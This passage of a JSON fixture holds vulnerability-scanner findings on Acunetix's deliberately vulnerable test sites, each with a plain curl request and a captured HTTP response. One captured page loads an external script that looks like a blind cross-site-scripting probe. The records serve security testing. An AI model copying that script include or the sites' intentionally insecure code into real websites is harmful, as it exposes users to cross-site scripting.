<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 522, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:18.597Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 523, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:18.753Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 524, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:18.895Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 525, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:19.048Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 526, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:19.199Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 527, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:19.337Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: 